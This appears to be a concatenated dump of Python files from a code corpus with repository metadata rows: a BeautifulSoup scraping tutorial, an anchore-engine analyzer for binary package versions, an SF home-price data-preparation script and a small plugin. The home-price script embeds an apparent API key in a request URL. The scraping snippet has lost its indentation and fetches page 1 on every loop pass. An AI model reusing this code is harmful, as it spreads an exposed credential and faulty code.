# 1. always try to get permission before scraping, otherwise I might be blocked
# 2. check the laws of whatever country we are operating in (for legal issues)
# LIMITATIONS
# each website is unique -> so for each website there must exist a Python script
# an update to a website might brake my script
import requests
import bs4
# Grabbing a title
result = requests.get("http://example.com")
type(result)
result.text
# bs with lxml tranforms the previous raw html into the following
soup = bs4.BeautifulSoup(result.text,'lxml')
soup
# returns the tag we specified as a list (i.e., there might be more than one)
soup.select('title')
soup.select('title')[0].getText()
soup.select('p')
site_paragraphs = soup.select('p')
type(site_paragraphs[0]) # not a string, instead is a specialized bs object,
# which is why we can do something like call .getText()
# Grabbing a class (from CSS) using soup.select()
# 'div' : all elements with 'div' tag
# '#some_id' : elements containing id='some_id'
# '.some_class' : elements containing class='some_class'
# 'div span' : any element named span within a div element
# 'div > span' : any element named span directly within a div element, with
# nothing in between
res = requests.get("https://en.wikipedia.org/wiki/Jonas_Salk")
soup = bs4.BeautifulSoup(res.text,'lxml')
soup.select('.toctext')[0].text
soup.select('.toctext')[0].getText()
for item in soup.select('.toctext'):
print(item.text)
# Grabbing an image
#soup.select('img') # can return more than what is needeed (it will depend on
# the website)
soup.select('.thumbimage')
jonas_salk = soup.select('.thumbimage')[0]
jonas_salk['src'] # we can treat it as a dictionary
image_link = requests.get('http://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Roosevelt_OConnor.jpg/220px-Roosevelt_OConnor.jpg')
#image_link.content # raw content of the image which is a binary file
#make sure to use the same format that the image has
f = open('my_image_image.jpg','wb') # wb means write binary
f.write(image_link.content)
f.close()
# Multiple elements across multiple pages
# GOAL: get title of every book with a 2 star rating
#Check that this also work with page 1
#http://books.toscrape.com/catalogue/page-2.html
base_url = 'http://books.toscrape.com/catalogue/page-{}.html'
req = requests.get(base_url.format(1))
soup = bs4.BeautifulSoup(req.text,'lxml')
products = soup.select(".product_pod") # always check the length, in this case should be 20
example = products[0]
# one way (not useful everytime)
'star-rating Two' in str(example)
# another way (checking for the presence of a class)
example.select('.star-rating.Three') # if there is a space in a class we should add a dot
example.select('.star-rating.Two') # nothing
example.select('a')[1]['title']
two_star_titles = []
for n in range(1,51):
scrape_url = base_url.format(n)
req = requests.get(base_url.format(1))
soup = bs4.BeautifulSoup(req.text,'lxml')
books = soup.select(".product_pod")
for book in books:
if len(book.select('.star-rating.Two')) != 0:
two_star_titles.append(book.select('a')[1]['title'])
two_star_titles
| 32.287037 | 135 | 0.694006 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,340 | 0.671064 |
9ef987b5b2fc09a91874ef390e457aed66cdf6c0 | 10,220 | py | Python | anchore_engine/analyzers/modules/33_binary_packages.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
]
| null | null | null | anchore_engine/analyzers/modules/33_binary_packages.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
]
| null | null | null | anchore_engine/analyzers/modules/33_binary_packages.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
import sys
import os
import re
import json
import traceback
import pkg_resources
import tarfile
from collections import OrderedDict
import anchore_engine.analyzers.utils, anchore_engine.utils
def get_python_evidence(tfl, member, memberhash, evidence):
global binary_package_el
fullpath = "/{}".format(member.name)
filename = os.path.basename(fullpath)
el = {}
el.update(binary_package_el)
patt_bin = re.match("^python([0-9]+\.[0-9]+)$", filename)
patt_lib = re.match("^libpython([0-9]+\.[0-9]+).so.*$", filename)
if (patt_bin or patt_lib) and member.isreg():
f_vers = ""
if patt_bin:
f_vers = patt_bin.group(1)
elif patt_lib:
f_vers = patt_lib.group(1)
with tfl.extractfile(member) as FH:
for line in FH.readlines():
subline = line
try:
the_re = ".*{}\.([0-9]+[-_a-zA-Z0-9]*).*".format(f_vers)
patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline)
if patt and f_vers:
b_vers = "{}.{}".format(f_vers, anchore_engine.utils.ensure_str(patt.group(1)))
if b_vers.startswith(f_vers):
el['name'] = 'python'
el['version'] = b_vers
el['location'] = fullpath
evidence['python']['binary'].append( el )
break
except Exception as err:
raise err
elif filename == "patchlevel.h" and member.isreg():
with tfl.extractfile(member) as FH:
for line in FH.readlines():
line = line.strip()
patt = re.match(b".*#define +PY_VERSION +\"*([0-9\.\-_a-zA-Z]+)\"*", line)
if patt:
h_vers = anchore_engine.utils.ensure_str(patt.group(1))
el['name'] = 'python'
el['version'] = h_vers
el['location'] = fullpath
evidence['python']['devel'].append(el)
break
def get_golang_evidence(tfl, member, memberhash, evidence):
global binary_package_el
fullpath = "/{}".format(member.name)
filename = os.path.basename(fullpath)
el = {}
el.update(binary_package_el)
if filename in ['go'] and member.isreg():
with tfl.extractfile(member) as FH:
for line in FH.readlines():
subline = line
try:
the_re = ".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*"
patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline)
if patt:
vers = anchore_engine.utils.ensure_str(patt.group(1))
el['name'] = 'go'
el['version'] = vers
el['location'] = fullpath
evidence['go']['binary'].append( el )
break
except Exception as err:
raise err
elif filename == "VERSION" and member.isreg():
with tfl.extractfile(member) as FH:
for line in FH.readlines():
line = line.strip()
patt = re.match(b".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*", line)
if patt:
vers = anchore_engine.utils.ensure_str(patt.group(1))
final_loc = fullpath
if memberhash.get(os.path.join(os.path.dirname(member.name), 'bin', 'go'), None):
final_loc = os.path.join("/", os.path.dirname(member.name), 'bin', 'go')
el['name'] = 'go'
el['version'] = vers
el['location'] = final_loc
evidence['go']['devel'].append( el )
break
def get_busybox_evidence(tfl, member, memberhash, distrodict, evidence):
global binary_package_el
fullpath = "/{}".format(member.name)
filename = os.path.basename(fullpath)
if filename == "busybox" and (member.isreg() or member.islnk()):
# Perform any specific checks using prior metadata
if distrodict.get('flavor', "") == 'BUSYB':
patt = re.match(".*([0-9]+\.[0-9]+\.[0-9]+).*", distrodict.get('fullversion', ""))
if patt:
version = anchore_engine.utils.ensure_str(patt.group(1))
el = {}
el.update(binary_package_el)
el['name'] = 'busybox'
el['version'] = version
el['location'] = fullpath
evidence['busybox']['binary'].append(el)
analyzer_name = "package_list"
try:
config = anchore_engine.analyzers.utils.init_analyzer_cmdline(sys.argv, analyzer_name)
except Exception as err:
print(str(err))
sys.exit(1)
imgname = config['imgid']
imgid = config['imgid_full']
outputdir = config['dirs']['outputdir']
unpackdir = config['dirs']['unpackdir']
squashtar = os.path.join(unpackdir, "squashed.tar")
resultlist = {}
version_found_map = {}
binary_package_el = {
'name': None,
'version': None,
'location': None,
'type': 'binary',
'files': [],
'license': 'N/A',
'origin': 'N/A',
'metadata': json.dumps({})
}
try:
allfiles = {}
if os.path.exists(unpackdir + "/anchore_allfiles.json"):
with open(unpackdir + "/anchore_allfiles.json", 'r') as FH:
allfiles = json.loads(FH.read())
else:
fmap, allfiles = anchore_engine.analyzers.utils.get_files_from_squashtar(os.path.join(unpackdir, "squashed.tar"))
with open(unpackdir + "/anchore_allfiles.json", 'w') as OFH:
OFH.write(json.dumps(allfiles))
# read in previous analyzer output for helping to increase accuracy of findings
fname = os.path.join(outputdir, 'pkgfiles.all')
pkgfilesall = anchore_engine.analyzers.utils.read_kvfile_todict(fname)
meta = anchore_engine.analyzers.utils.get_distro_from_squashtar(os.path.join(unpackdir, "squashed.tar"), unpackdir=unpackdir)
distrodict = anchore_engine.analyzers.utils.get_distro_flavor(meta['DISTRO'], meta['DISTROVERS'], likedistro=meta['LIKEDISTRO'])
# set up ordered dictionary structure for the runtimes and evidence types
evidence = OrderedDict()
for runtime in ['python', 'go', 'busybox']:
evidence[runtime] = OrderedDict()
for etype in ['binary', 'devel']:
evidence[runtime][etype] = []
# Perform a per file routine to evaluate files for gathering binary package version evidence
with tarfile.open(os.path.join(unpackdir, "squashed.tar"), mode='r', format=tarfile.PAX_FORMAT) as tfl:
alltnames = tfl.getnames()
alltfiles = {}
for name in alltnames:
alltfiles[name] = True
memberhash = anchore_engine.analyzers.utils.get_memberhash(tfl)
for member in list(memberhash.values()):
try:
get_python_evidence(tfl, member, memberhash, evidence)
except Exception as err:
print ("WARN: caught exception evaluating file ({}) for python runtime evidence: {}".format(member.name, str(err)))
try:
get_golang_evidence(tfl, member, memberhash, evidence)
except Exception as err:
print ("WARN: caught exception evaluating file ({}) for golang runtime evidence: {}".format(member.name, str(err)))
try:
get_busybox_evidence(tfl, member, memberhash, distrodict, evidence)
except Exception as err:
print ("WARN: caught exception evaluating file ({}) for busybox runtime evidence: {}".format(member.name, str(err)))
resultlist = {}
for runtime in evidence.keys(): #['python', 'go']:
for e in evidence[runtime].keys(): #['binary', 'devel']:
for t in evidence[runtime][e]:
version = t.get('version')
location = t.get('location')
if location in pkgfilesall:
print ("INFO: Skipping evidence {} - file is owned by OS package".format(location))
else:
key = "{}-{}".format(runtime, version)
if key not in version_found_map:
result = {}
result.update(binary_package_el)
result.update(t)
result['metadata'] = json.dumps({"evidence_type": e})
resultlist[location] = json.dumps(result)
version_found_map[key] = True
try:
squashtar = os.path.join(unpackdir, "squashed.tar")
hints = anchore_engine.analyzers.utils.get_hintsfile(unpackdir, squashtar)
for pkg in hints.get('packages', []):
pkg_type = pkg.get('type', "").lower()
if pkg_type == 'binary':
try:
pkg_key, el = anchore_engine.analyzers.utils._hints_to_binary(pkg)
try:
resultlist[pkg_key] = json.dumps(el)
except Exception as err:
print ("WARN: unable to add binary package ({}) from hints - excpetion: {}".format(pkg_key, err))
except Exception as err:
print ("WARN: bad hints record encountered - exception: {}".format(err))
except Exception as err:
print ("WARN: problem honoring hints file - exception: {}".format(err))
except Exception as err:
import traceback
traceback.print_exc()
print("WARN: analyzer unable to complete - exception: " + str(err))
if resultlist:
ofile = os.path.join(outputdir, 'pkgs.binary')
anchore_engine.analyzers.utils.write_kvfile_fromdict(ofile, resultlist)
#print ("RESULT: {}".format(resultlist))
sys.exit(0)
| 41.044177 | 148 | 0.545108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,028 | 0.198434 |
9ef9c33373ed6286394fc6556d56b0671f5ed0ac | 20,610 | py | Python | SF-home-price-prediction/src/preparation.py | apthomas/SF-home-price-prediction | 448dac93ef26022bc81fab4665a12f592f9556a1 | [
"MIT"
]
| null | null | null | SF-home-price-prediction/src/preparation.py | apthomas/SF-home-price-prediction | 448dac93ef26022bc81fab4665a12f592f9556a1 | [
"MIT"
]
| null | null | null | SF-home-price-prediction/src/preparation.py | apthomas/SF-home-price-prediction | 448dac93ef26022bc81fab4665a12f592f9556a1 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import csv
import urllib.request
import json
from datetime import datetime
from datetime import timedelta
from sklearn.preprocessing import MinMaxScaler
import web_scrapers
import os
def load_real_estate_data(filename, state_attr, state):
df = pd.read_csv(filename, encoding="ISO-8859-1")
df = df.loc[df[state_attr] == state]
return df
def load_data(filenames):
df_list=[]
for i in range(0, len(filenames)):
df = pd.read_csv(filenames[i], encoding="ISO-8859-1")
df_list.append(df)
return df_list
def create_zipcode_list(filenames):
zipcodes = {} # structured with within 5, 10 miles from another zipcode
zip_list = []
for i in range(0, len(filenames)):
with open(filenames[i], 'r', encoding='utf-8-sig') as f:
reader = csv.reader(f)
your_list = list(reader)
for z in range(0, len(your_list)):
zipcodes[your_list[z][0]] = [], []
zip_list.append(your_list[z][0])
return zipcodes, zip_list
def wrangle_real_estate_data(df, zip_list, drop_columns):
df = df[df['RegionName'].isin(zip_list)]
df = df.drop(drop_columns, axis=1)
return df
def wrangle_IPO_data(df, zip_list):
df['Date Filed'] = pd.to_datetime(df['Date Filed'], format='%Y-%m-%d')
df['Lockup Expiration Date'] = pd.to_datetime(df['Lockup Expiration Date'], errors='coerce', format='%m/%d/%Y')
df = df[df['Zipcode'].isin(zip_list)]
df = df.drop(['Lockup Expiration Date'], axis=1)
df['Lockup Expiration Date'] = df['Date Filed'] + timedelta(days=180)
df = df[df['Date Filed']> df['Date Filed'].min()+ timedelta(days=366)]
return df
def wrangle_census_data(df_census_econ, df_census_dem, zip_list, census_econ_columns, census_dem_columns):
df_census_econ.rename(columns={'Id2': 'Zipcode'}, inplace=True)
df_census_econ.rename(
columns={'Percent; EMPLOYMENT STATUS - Civilian labor force - Unemployment Rate': 'Unemployment Rate'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Less than $10,000': 'l10000'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $10,000 to $14,999': 'l15000'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $15,000 to $24,999': 'l25000'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; COMMUTING TO WORK - Mean travel time to work (minutes)': 'Mean Travel Time to Work Estimate (minutes)'},
inplace=True)
df_census_econ.rename(columns={
'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $200,000 or more': 'Percent of Households with Income Greater than $200,000'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Median household income (dollars)': 'Median Household Income Estimate (dollars)'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Mean household income (dollars)': 'Mean Household Income Estimate (dollars)'},
inplace=True)
df_census_econ.rename(columns={
'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Per capita income (dollars)': 'Per Capita Income Estimate (dollars)'},
inplace=True)
df_census_econ.rename(columns={
'Percent; HEALTH INSURANCE COVERAGE - Civilian noninstitutionalized population - No health insurance coverage': 'Percent of Population with no Health Insurance Coverage'},
inplace=True)
df_census_econ.rename(columns={
'Percent; PERCENTAGE OF FAMILIES AND PEOPLE WHOSE INCOME IN THE PAST 12 MONTHS IS BELOW THE POVERTY LEVEL - All people': 'Percent of People whose Income in the Past 12 months has been Below Poverty Level'},
inplace=True)
df_census_econ['l10000'].replace("-", "0.0", regex=True, inplace=True)
df_census_econ['l10000'].replace("N", "0.0", regex=True, inplace=True)
df_census_econ['l10000'] = df_census_econ['l10000'].astype(float)
df_census_econ['l15000'].replace("-", "0.0", regex=True, inplace=True)
df_census_econ['l15000'].replace("N", "0.0", regex=True, inplace=True)
df_census_econ['l15000'] = df_census_econ['l15000'].astype(float)
df_census_econ['l25000'].replace("-", "0.0", regex=True, inplace=True)
df_census_econ['l25000'].replace("N", "0.0", regex=True, inplace=True)
df_census_econ['l25000'] = df_census_econ['l25000'].astype(float)
df_census_econ["Percent of Households With Income Less Than $24,999"] = df_census_econ['l10000'] + df_census_econ[
'l15000'] + df_census_econ['l25000']
df_census_econ = df_census_econ.filter(census_econ_columns)
df_census_dem.rename(columns={'Id2': 'Zipcode'}, inplace=True)
df_census_dem.rename(columns={'Estimate; SEX AND AGE - Median age (years)': 'Median Age'}, inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - Under 18 years': 'Percent of People under 18 years of age'},
inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - 65 years and over': 'Percent of People 65 years and over'},
inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Male': 'Percent of Males'}, inplace=True)
df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Female': 'Percent of Females'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Hispanic or Latino (of any race)': 'Percent of People who are Hispanic'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - White alone': 'Percent of People who are White'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Black or African American alone': 'Percent of People who are Black or African American'},
inplace=True)
df_census_dem.rename(columns={
'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Asian alone': 'Percent of People who are Asian'},
inplace=True)
df_census_dem = df_census_dem.filter(census_dem_columns)
# filter data to only Silicon Valley + San Francisco Zip Codes
df_census_dem = df_census_dem[df_census_dem['Zipcode'].isin(zip_list)]
df_census_econ = df_census_econ[df_census_econ['Zipcode'].isin(zip_list)]
return df_census_econ, df_census_dem
def wrangle_real_estate_headers(df):
'''
run before joining dataframes so keys match
df_sale_counts_by_zip_silicon_valley.columns = df_sale_counts_by_zip_silicon_valley.columns.str.replace('Sales Counts ', '')
df_sale_counts_by_zip_silicon_valley = df_sale_counts_by_zip_silicon_valley.add_prefix('Sales Counts ')
df_sale_counts_by_zip_silicon_valley.rename(columns = {'Sales Counts RegionName':'Zipcode'}, inplace=True)
'''
df.columns = df.columns.str.replace('All Homes ', '')
df = df.add_prefix('All Homes ')
df.rename(columns={'All Homes RegionName': 'Zipcode'}, inplace=True)
return df
def wrangle_ipo_headers(df):
df.rename(columns={'Ticker': 'Symbol'}, inplace=True)
df["Found"] = df["Found"].astype(dtype=np.int64)
return df
def join_data(df1, df2, key, join_type):
df = df1.set_index(key).merge(df2, on=key, how=join_type)
return df
def merge_data(df1, df2, key):
df = pd.merge(df1, df2, on=key, how='inner')
return df
def df_replace(df, replace_list):
for i in range(0, len(replace_list)):
df = df.replace([replace_list[i]], [''], regex=True)
return df
def drop_columns_and_nans(df, drop_columns, nan_columns):
df = df.drop(['IPO Name', 'Offer date', 'CUSIP', 'PERM'], axis=1)
for i in range(0, len(nan_columns)):
df.drop_duplicates(subset=nan_columns[i], keep='first', inplace=True)
return df
def calculate_distance_between_zips(zipcode, min_radius, max_radius):
# api-endpoint
URL_base = "https://api.zip-codes.com/ZipCodesAPI.svc/1.0/FindZipCodesInRadius?zipcode="
URL = URL_base + zipcode + '&minimumradius=' + min_radius + '&maximumradius=' + max_radius + '&key=UNBQ2435TAEYA5EIC8J6'
# sending get request and saving the response as response object
contents = urllib.request.urlopen(URL).read()
# printing the output
zipcodes_nearby = []
print(json.loads(contents))
for i in range(1, len(json.loads(contents)['DataList'])):
zipcodes_nearby.append(json.loads(contents)['DataList'][i]['Code'])
return zipcodes_nearby
def create_zipcode_distances_dictionary(zipcodes, zip_list):
'''
***DONT RUN IF THESE ARE ALREADY CREATED***
currently stored as data/processed/zipcodes_within_radius.txt
'''
print(len(zip_list))
for i in range(0, len(zip_list)):
zipcodes[zip_list[i]] = calculate_distance_between_zips(zip_list[i], '0', '5'), calculate_distance_between_zips(
zip_list[i], '5', '10')
return zipcodes
def create_text_file_from_dictionary(filename, dictionary):
'''
with open('data/processed/zipcodes_within_radius.txt', 'w') as json_file:
json.dump(zipcodes, json_file)
'''
with open(filename, 'w') as json_file:
json.dump(dictionary, json_file)
return dictionary
def export_dataframe_to_dictionary(df, name):
filename = 'data/processed/' + name + '.csv'
export_csv = df.to_csv(filename, index=True, header=True) # Don't forget to add '.csv' at the end of the path
def update_zipcodes_dict(zipcodes, zip_list):
exists = os.path.isfile('../data/processed/zipcodes_within_radius.txt')
if not exists:
zipcodes = create_zipcode_distances_dictionary(zipcodes, zip_list)
create_text_file_from_dictionary('../data/processed/zipcodes_within_radius.txt', zipcodes)
else:
zipcodes = {}
with open('../data/processed/zipcodes_within_radius.txt', 'r') as f:
zipcodes = json.load(f)
return zipcodes
def create_IPO_an_Zipcode_dataframe(census_econ_cols, census_dem_cols, df_ipo, df_zip, zipcodes):
if 'Zipcode' in census_econ_cols:
census_econ_cols.remove('Zipcode')
if 'Zipcode' in census_dem_cols:
census_dem_cols.remove('Zipcode')
ipo_header_list = list(df_ipo.columns.values) +census_dem_cols+census_econ_cols + ['All Homes Date Filed',
'All Homes Lockup Expiration Date',
'All Homes 1 Year Before Date Filed',
'All Homes 2 Years After Date Filed']
'''
Distance from IPO = estimate is .2 if in the same zipcode as IPO
= estimate is 0.5 if not in same zip code as IPO and less than 5 miles from zipcode to IPO
= estimate is 1 if greater than 5 and less than 10 miles from zipcode to IPO
'''
new_df_list = []
for index, row in df_ipo.iterrows():
ipo_zipcode = str(row['Zipcode'])
zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(ipo_zipcode)]
headerList = join_IPO_and_Zip_Data(row['Date Filed'], row['Lockup Expiration Date'], census_econ_cols,census_dem_cols)
data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None)
dictionary = dict(zip(ipo_header_list, data))
dictionary['Symbol'] = index
dictionary['Distance to IPO'] = .2
dictionary['Zipcode for Distance'] = ipo_zipcode
new_df_list.append(dictionary)
within_5miles = zipcodes[ipo_zipcode][0]
within_10miles = zipcodes[ipo_zipcode][1]
for i in range(0, len(within_5miles)):
zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_5miles[i])]
data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None)
dictionary = dict(zip(ipo_header_list, data))
dictionary['Symbol'] = index
dictionary['Distance to IPO'] = .5
dictionary['Zipcode for Distance'] = within_5miles[i]
new_df_list.append(dictionary)
for j in range(0, len(within_10miles)):
zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_10miles[j])]
data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None)
dictionary = dict(zip(ipo_header_list, data))
dictionary['Symbol'] = index
dictionary['Distance to IPO'] = 1
dictionary['Zipcode for Distance'] = within_10miles[j]
new_df_list.append(dictionary)
ipo_final_df = pd.DataFrame(new_df_list)
ipo_final_df.dropna(subset=['Median Age'], how='all', inplace=True)
ipo_final_df.dropna(subset=['All Homes Date Filed'], how='all', inplace=True)
return ipo_final_df
def normalize_IPO_an_Zipcode_dataframe(normalization_list, df_ipo):
df_ipo = df_ipo.replace(['--'], [''], regex=True)
df_ipo = df_ipo.replace(r'^\s*$', np.nan, regex=True)
df_ipo = df_ipo.replace(['\,'], [''], regex=True)
df_ipo = df_ipo.replace(['\+'], [''], regex=True)
scaler = MinMaxScaler()
df_ipo[normalization_list] = scaler.fit_transform(df_ipo[normalization_list])
return df_ipo
def join_IPO_and_Zip_Data(IPO_Date_Filed, IPO_Lockup_Expiration_Date, census_econ_cols, census_dem_cols):
filtered_columns = census_dem_cols +census_econ_cols # remove 'zipcode'
ipo_month_filed = IPO_Date_Filed.month
ipo_year_filed = IPO_Date_Filed.year
AllHomes_header_filed = 'All Homes ' + str(ipo_year_filed) + '-' + str(ipo_month_filed).zfill(2)
ipo_month = IPO_Lockup_Expiration_Date.month
ipo_year = IPO_Lockup_Expiration_Date.year
AllHomes_header_lockup = 'All Homes ' + str(ipo_year) + '-' + str(ipo_month).zfill(2)
AllHomes_header_filed_1_yr_ago = 'All Homes ' + str(int(ipo_year_filed) - 1) + '-' + str(ipo_month_filed).zfill(2)
AllHomes_header_filed_2_yr = 'All Homes ' + str(int(ipo_year_filed) + 2) + '-' + str(ipo_month_filed).zfill(2)
filtered_columns = filtered_columns + [AllHomes_header_filed, AllHomes_header_lockup,
AllHomes_header_filed_1_yr_ago,
AllHomes_header_filed_2_yr]
return filtered_columns
def update_ipo_list(year, start_month, end_month):
web_scrapers.add_new_ipo_data_to_csv('../data/processed/1997-04_2019_full_ipo_data.csv', year, start_month, end_month)
df_ipo_list = load_data(['../data/processed/1997-04_2019_full_ipo_data.csv', '../data/raw/ipo_ritter_data.csv'])
zipcodes, zip_list = create_zipcode_list(
['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv',
'../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv'])
df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list)
df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1])
df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left')
df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK'])
df_ipo.to_csv("../data/processed/df_ipo.csv", index=True)
def main():
df_real_estate = load_real_estate_data('../data/raw/Zip_Zhvi_AllHomes.csv', 'State', 'CA')
# data processing to load all IPO Data between 1997 and present data. This data has been scraped using code from src/web_scrapers.py
df_ipo_list = load_data(['../data/processed/df_ipo.csv', '../data/raw/ipo_ritter_data.csv'])
df_census_list = load_data(['../data/raw/zip_census_bureau_economic_characteristics_2017.csv', '../data/raw/zip_census_bureau_age_race_2017.csv'])
zipcodes, zip_list = create_zipcode_list(
['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv',
'../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv'])
df_real_estate = wrangle_real_estate_data(df_real_estate, zip_list,['City', 'State', 'Metro', 'CountyName', 'SizeRank'])
df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list)
census_econ_columns = ['Zipcode',
'Unemployment Rate',
'Mean Travel Time to Work Estimate (minutes)',
'Percent of Households with Income Greater than $200,000',
'Median Household Income Estimate (dollars)',
'Mean Household Income Estimate (dollars)',
'Per Capita Income Estimate (dollars)',
'Percent of Population with no Health Insurance Coverage',
'Percent of People whose Income in the Past 12 months has been Below Poverty Level',
'Percent of Households With Income Less Than $24,999']
census_dem_columns = ['Zipcode',
'Median Age',
'Percent of People under 18 years of age',
'Percent of People 65 years and over',
'Percent of Males',
'Percent of Females',
'Percent of People who are Hispanic',
'Percent of People who are White',
'Percent of People who are Black or African American',
'Percent of People who are Asian']
df_census_econ, df_census_dem = wrangle_census_data(df_census_list[0], df_census_list[1], zip_list,
census_econ_columns, census_dem_columns)
df_real_estate = wrangle_real_estate_headers(df_real_estate)
df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1])
df_ipo_ritter = df_ipo_ritter.drop(['Found'], axis=1)
df_census = join_data(df_census_econ, df_census_dem, 'Zipcode', 'inner')
df_zip = merge_data(df_census, df_real_estate, 'Zipcode')
df_zip = df_replace(df_zip, ['\+', '\,'])
print(df_zip['All Homes 2019-05'])
df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left')
df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK'])
df_ipo['Found'] = 2019.0 - df_ipo['Found']
normalization_list = ['Offer Amount', 'Number of Employees', 'Found', 'Median Age',
'Percent of People under 18 years of age',
'Percent of People 65 years and over',
'Percent of Males',
'Percent of Females',
'Percent of People who are Hispanic',
'Percent of People who are White',
'Percent of People who are Black or African American',
'Percent of People who are Asian',
'Unemployment Rate',
'Mean Travel Time to Work Estimate (minutes)',
'Percent of Households with Income Greater than $200,000',
'Median Household Income Estimate (dollars)',
'Mean Household Income Estimate (dollars)',
'Per Capita Income Estimate (dollars)',
'Percent of Population with no Health Insurance Coverage',
'Percent of People whose Income in the Past 12 months has been Below Poverty Level',
'Percent of Households With Income Less Than $24,999']
zipcodes = update_zipcodes_dict(zipcodes, zip_list)
df_ipo_all = create_IPO_an_Zipcode_dataframe(census_econ_columns, census_dem_columns, df_ipo, df_zip, zipcodes)
df_ipo_all.to_csv("../data/processed/df_ipo_all.csv", index=False)
if __name__ == "__main__":
print("we are wrangling data")
#update_ipo_list(2019, 6, 7)
main() | 51.654135 | 214 | 0.655313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,893 | 0.382969 |
9ef9d0cb1ac73ebdbfd64d7d2d0514517d257322 | 734 | py | Python | src/python/director/builtin/plugins/measurement_tool/plugin.py | afdaniele/director | 845ba027f9009803fcf77f44874f2ab9d7ab72e3 | [
"BSD-3-Clause"
]
| null | null | null | src/python/director/builtin/plugins/measurement_tool/plugin.py | afdaniele/director | 845ba027f9009803fcf77f44874f2ab9d7ab72e3 | [
"BSD-3-Clause"
]
| null | null | null | src/python/director/builtin/plugins/measurement_tool/plugin.py | afdaniele/director | 845ba027f9009803fcf77f44874f2ab9d7ab72e3 | [
"BSD-3-Clause"
]
| null | null | null | from director.devel.plugin import GenericPlugin
from director.fieldcontainer import FieldContainer
from .lib import measurementpanel
from PythonQt import QtCore
class Plugin(GenericPlugin):
ID = 'measurement_tool'
NAME = 'MeasurementTool'
DEPENDENCIES = ['MainWindow']
def __init__(self, app, view):
super(Plugin, self).__init__(app, view)
def init(self, fields):
measurementPanel = measurementpanel.MeasurementPanel(self.app, self.view)
measurementDock = self.app.addWidgetToDock(
measurementPanel.widget,
QtCore.Qt.RightDockWidgetArea,
visible=False
)
# ---
return FieldContainer(
measurementToolPanel=measurementPanel,
measurementToolDock=measurementDock
)
| 25.310345 | 77 | 0.741144 | 569 | 0.775204 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.070845 |
9efa004ed72e268641173fcd54de72edaac3595f | 4,858 | py | Python | jupyter_book/yaml.py | akhmerov/jupyter-book | 06b8134af1266655717df474438bed2569b14efe | [
"BSD-3-Clause"
]
| 1 | 2021-04-26T03:21:49.000Z | 2021-04-26T03:21:49.000Z | jupyter_book/yaml.py | akhmerov/jupyter-book | 06b8134af1266655717df474438bed2569b14efe | [
"BSD-3-Clause"
]
| 1 | 2020-08-26T08:27:27.000Z | 2020-08-27T18:00:42.000Z | jupyter_book/yaml.py | phaustin/jupyter-book | 674b222d44cc1acb858804782cee4549eef03fb1 | [
"BSD-3-Clause"
]
